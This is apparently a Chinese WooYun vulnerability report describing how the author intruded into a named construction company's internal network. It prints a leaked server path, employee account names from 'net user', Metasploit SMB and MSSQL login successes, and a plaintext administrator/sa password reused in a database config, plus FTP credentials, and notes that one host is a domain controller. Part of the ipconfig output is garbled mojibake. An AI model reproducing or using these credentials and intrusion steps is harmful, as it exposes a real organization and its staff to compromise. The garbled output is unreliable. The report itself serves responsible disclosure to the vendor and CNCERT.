乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-09: 细节向普通白帽子公开 2016-02-19: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
现在开始看《三体》,感觉现在的状态就像智子来了一样,封锁了一切,很难再取得进步。。。
**.**.**.**:232/pm/sys/Login_dologin.actionS-16dir:I:\Java\Workspaces\MyEclipseforSpring2014\pm-tomcat\webapp\
ipconfig��̫�������� �������� 2: �����ض��� DNS �� . . . . . . . : �������� IPv6 ��ַ. . . . . . . . : fe80::c5d0:386a:2fb1:5fb1%12 IPv4 ��ַ . . . . . . . . . . . . : **.**.**.** �������� . . . . . . . . . . . . : **.**.**.** Ĭ������. . . . . . . . . . . . . : **.**.**.**���������� isatap.{DB7816FC-A6BF-47B3-BFC5-B2EDA131418A}: ý��״̬ . . . . . . . . . . . . : ý���ѶϿ� �����ض��� DNS �� . . . . . . . : ���������� isatap.{936AD410-5B41-457B-B600-D7377B70098E}: ý��״̬ . . . . . . . . . . . . : ý���ѶϿ� �����ض��� DNS �� . . . . . . . : ���������� Teredo Tunneling Pseudo-Interface: �����ض��� DNS �� . . . . . . . : IPv6 ��ַ . . . . . . . . . . . . : 2001:0:da1e:40c2:87f:3e7e:3f57:f5e8 �������� IPv6 ��ַ. . . . . . . . : fe80::87f:3e7e:3f57:f5e8%23 Ĭ������. . . . . . . . . . . . . : ::
net user -------------------------------------------------------------------------------Administrator CVSMANAGER_USER dengxiuchuan gaojun Guest guoweizhong ligui lingtianxian liuxutao lizhuoyuan luojie lz mxd pangpei shumiaoqing webqq yanjun zengmin zhangxin zhangyingying zhaoyang
配合metasploit,得到主机的账户密码,除了administrator之外其他全是空口令得到administrator密码为zHang(#!!@(通过smb_login模块,找到了7台windows主机,linux的没有测试
[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@('[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@('[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@('[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@('[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@(' Administrator[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@('[+] **.**.**.**:445 SMB - Success: 'WORKSTATION\administrator:zHang(#!!@(' Administrator
基本上就确定了这几台服务器已经沦陷,经过翻看数据库等等配置文件,找到了其他的一些密码
<!-- <property name="connection.driver_class">net.sourceforge.jtds.jdbc.Driver</property> <property name="connection.url">jdbc:jtds:sqlserver://**.**.**.**:1433/PMDBZJ3_2</property> <property name="connection.username">sa</property> <property name="connection.password">zHang(#!!@(</property> --> <!-- type2.1:mssql end --> <!-- type2.2:oracle C3P0 --> <!-- <property name="connection.driver_class">oracle.jdbc.driver.OracleDriver</property> <property name="connection.url">jdbc:oracle:thin:@**.**.**.**:1521:orcl</property> <property name="connection.username">dbo_pmdbzj3j</property> <property name="connection.password">dbo_pmdbzj3j</property> -->
[+] **.**.**.**:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:zHang(#!!@([+] **.**.**.**:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:zHang(#!!@([+] **.**.**.**:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:zHang(#!!@(
host=**.**.**.**userName=ftpuserpassWord=zj31ftprootPath=/ims/upfiles/port=21
找到说明文件,可以看到本机是域控主机
**.**.**.** >> >>Mrvl-R1_0 >>Success**.**.**.** >> 中建三局第一建设工程有限公司 - >>Apache/2.2.16 (Win32) PHP/5.3.3 >>Success**.**.**.** >> >>Apache-Coyote/1.1 >>Success**.**.**.** >> Login>>Boa/0.94.13 >>Success**.**.**.** >> >>lua-httpd >>Success**.**.**.** >> >>SinforHttpd/1.0 >>Success**.**.**.** >> >>SinforHttpd/1.0 >>Success
更新中间件
危害等级:高
漏洞Rank:10
确认时间:2016-01-20 15:51
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。
暂无